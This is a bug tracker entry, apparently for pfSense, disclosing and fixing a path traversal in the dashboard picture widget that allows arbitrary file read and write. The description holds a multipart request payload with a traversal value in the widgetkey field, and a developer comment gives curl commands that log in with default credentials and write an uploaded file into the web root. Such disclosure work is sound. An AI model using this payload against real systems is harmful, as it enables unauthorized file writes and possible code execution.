Project

General

Profile

Actions

Bug #9610

closed

picture.widget.php: Arbitrary file read/write

Added by LoRexxar Romer over 2 years ago. Updated over 1 year ago.

Status:
Resolved
Priority:
High
Assignee:
Category:
Dashboard
Target version:
Start date:
07/01/2019
Due date:
% Done:

100%

Estimated time:
Plus Target Version:
Release Notes:
Affected Version:
All
Affected Architecture:
All

Description

in `/widgets/widgets/picture.widget.php`, when we post a widgetkey and upload a image , we can create or read a arbitrary start with `/conf/widget_image.`.

just post like


-----------------------------14628177746144
Content-Disposition: form-data; name="__csrf_magic" 

sid:89edfa320c11ca68aef40bcf3badc3bc08776121,1561963857
-----------------------------14628177746144
Content-Disposition: form-data; name="widgetkey" 

d/../../../../../../usr/local/www/test.php
-----------------------------14628177746144
Content-Disposition: form-data; name="descr" 

test
-----------------------------14628177746144
Content-Disposition: form-data; name="pictfile"; filename="test.png" 
Content-Type: image/png

Actions #1

Updated by Jim Pingle over 2 years ago

  • Private changed from No to Yes
Actions #2

Updated by Jim Pingle over 2 years ago

  • Category set to Dashboard
  • Assignee set to Jim Pingle
  • Target version set to 2.5.0
  • Affected Version set to All
  • Affected Architecture All added
  • Affected Architecture deleted ()
Actions #3

Updated by Jim Pingle over 2 years ago

I was able to replicate the problem.

To reproduce with cURL:

1. Login:

curl -L -k --cookie-jar cookies.txt \
   https://192.168.1.1/ \
   | grep "name='__csrf_magic'" \
   | sed 's/.*value="\(.*\)".*/\1/' > csrf.txt
curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \
   --data-urlencode "login=Login" \
   --data-urlencode "usernamefld=admin" \
   --data-urlencode "passwordfld=pfsense" \
   --data-urlencode "__csrf_magic=$(cat csrf.txt)" \
   https://192.168.1.1/ > /dev/null

2. Fetch a CSRF token:

curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \
   https://192.168.1.1/ \
     | grep "name='__csrf_magic'"   \
     | sed 's/.*value="\(.*\)".*/\1/' > csrf.txt

3. Copy a local png file to test.png

4. Submit the file with parameters as mentioned above:

curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \
   -F "__csrf_magic=$(head -n 1 csrf.txt)" \
   -F "widgetkey=d/../../../../../../usr/local/www/test.php" \
   -F "descr=Test" \
   -F "pictfile=@test.png;filename=test.png" \
   https://192.168.1.1/widgets/widgets/picture.widget.php

At this point, /usr/local/www/test.php contains the contents of the uploaded file. If the file contained a proper image header and then other data, it could be processed in unexpected ways.

Also, the code which retrieves the image is somewhat suspect, though I don't think it's exploitable, it needs cleaned up.

Actions #4

Updated by Jim Pingle over 2 years ago

  • Status changed from New to Feedback
  • % Done changed from 0 to 100
Actions #5

Updated by Jim Pingle about 2 years ago

  • Target version changed from 2.5.0 to 2.4.5
Actions #6

Updated by Jim Pingle almost 2 years ago

  • Subject changed from arbitrary file read and write(can lead to RCE) to picture.widget.php: Arbitrary file read/write
Actions #7

Updated by Jim Pingle almost 2 years ago

  • Status changed from Feedback to Resolved

Re-confirmed against 2.4.4-p3 and then confirmed fixed against 2.4.5 and 2.5.0.

Actions #8

Updated by Jim Pingle almost 2 years ago

See also: #9731

Actions #9

Updated by Jim Pingle over 1 year ago

  • Private changed from Yes to No
Actions #10

Updated by LoRexxar Romer over 1 year ago

Hello,

I request the CVEID CVE-2019-16915.

and my id is LoRexxar@knownsec 404team.

I hope to change my id to this in public information in https://www.netgate.com/assets/downloads/advisories/pfSense-SA-20_04.webgui.asc

Thanks.

Actions

Also available in: Atom PDF